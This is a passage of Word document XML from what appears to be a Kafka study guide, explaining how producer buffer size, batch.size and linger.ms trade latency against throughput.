          <w:numId w:val="148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A </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>smaller buffer size</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> may lead to faster message delivery (lower latency), but the producer will have to send messages more frequently, potentially reducing throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBD994B" w14:textId="77777777" w:rsidR="00495D8C"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DDA75A">
          <v:rect id="_x0000_i3195" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAEAB30" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C"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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EA1B38" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C"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he </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>producer buffer size</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Kafka has a significant impact on message delivery performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7522F175" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148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arger buffers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> generally improve throughput and efficiency by allowing messages to be batched together, reducing the number of requests to the broker. However, they may increase latency and memory usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58960598" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148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maller buffers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> reduce latency but could cause more frequent network requests, increasing the load on brokers and potentially lowering throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E618E3C" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C"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hoosing the right buffer size is a balance between throughput and latency, based on your use case, message volume, and system resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D59C2D" w14:textId="0907B26C"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1628F1D">
          <v:rect id="_x0000_i3196" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D54323" w14:textId="14F51543" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E3566C" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="803" w:name="_Toc196308283"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Discuss how buffer sizes in the Kafka producer affect message delivery, latency, and throughput</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="803"/>
    </w:p>
    <w:p w14:paraId="73C5CF72" w14:textId="07DBD221" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Impact of Buffer Size in Kafka Producer on Message Delivery, Latency, and Throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B442ED" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A"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In Kafka, the producer is responsible for sending messages to Kafka brokers, and it uses an in-memory buffer to temporarily store messages before they are sent. The </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>buffer size</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> plays a crucial role in how the producer interacts with Kafka brokers, and it impacts </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message delivery</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latency</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throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7830F9" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A"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Here’s an in-depth analysis of how buffer sizes affect these aspects:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FBA71C" w14:textId="77777777" w:rsidR="00C40C3A"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0F35A4D">
          <v:rect id="_x0000_i3197" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0646B12C" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A"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1. Message Delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610789D9" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148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uffer Size &amp; Message Batching</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The producer uses the buffer to accumulate messages before sending them to Kafka brokers. The </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>larger the buffer</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, the more messages can be accumulated in memory. Once the buffer reaches the defined size (batch.size), the producer sends a batch of messages to the broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794031C1" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148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elivery Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC1B6D8" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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arge Buffer</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: With a larger buffer, the producer can send larger batches of messages, which improves efficiency and reduces the overhead of sending messages one-by-one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58904E84" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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mall Buffer</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: With a smaller buffer, the producer might send smaller batches more frequently, increasing the overall </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>network requests</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and potentially reducing efficiency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3320F3D2" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148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essage Delivery Timing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12369F46" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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he </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linger.ms</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter also interacts with the buffer size. If set to a value greater than 0 (e.g., 10ms), the producer will wait up to that amount of time to try to fill the buffer with more messages before sending them. This means that </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>larger buffers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow for more messages to be accumulated before being sent, leading to fewer requests to the broker, but it could delay message delivery slightly. </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Smaller buffers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> may result in more frequent but smaller sends, reducing latency but increasing overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54890E0E" w14:textId="77777777" w:rsidR="00C40C3A"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2DC0DCC">
          <v:rect id="_x0000_i3198" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ED0FD2" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A"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2. Latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2984B1E0" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148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uffer Size and Latency Trade-off</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A895E5" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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arger Buffers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A larger buffer size can increase </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>latency</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to the producer waiting to accumulate more messages in memory (to fill the batch size) before sending them. If the producer has to wait too long to fill the buffer, it could cause a delay in delivering messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788B62E1" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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maller Buffers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A smaller buffer can result in lower latency since the producer doesn’t need to wait for as many messages to accumulate before sending them. However, sending messages more </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">frequently (without batching) may also increase the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>network load</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message processing overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which could degrade overall performance if the system has to handle many small messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165D5923" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148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Waiting Time</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16314FE3" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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If the buffer is </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>full</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the producer cannot send messages quickly enough, the producer can block and wait for space in the buffer to be freed up. This can </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>increase latency</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if the system has high traffic or slow brokers. A </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>larger buffer</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> reduces the frequency of blocking but may introduce higher </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>waiting time</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for individual messages if the batch is not filled quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD26578" w14:textId="77777777" w:rsidR="00C40C3A"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F0A0C13">
          <v:rect id="_x0000_i3199" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8B9AAA" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A"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3. Throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB93F27" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149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uffer Size and Throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B89B61" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="149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arger Buffers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The larger the buffer, the more messages the producer can accumulate and send in a single batch. Sending larger batches of messages reduces the overhead of opening new connections, processing metadata, and network round trips, which increases the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2D9468" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="149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maller Buffers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: With smaller buffers, the producer sends messages more frequently, which increases the overhead of sending each batch, reducing throughput. Even though individual messages may be sent faster, the total rate of messages sent will be slower.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A32E27" w14:textId="77777777" w:rsidR="00C40C3A" w:rsidRPr="0003272F" w:rsidRDefault="00C40C3A" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149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atch Size and Throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
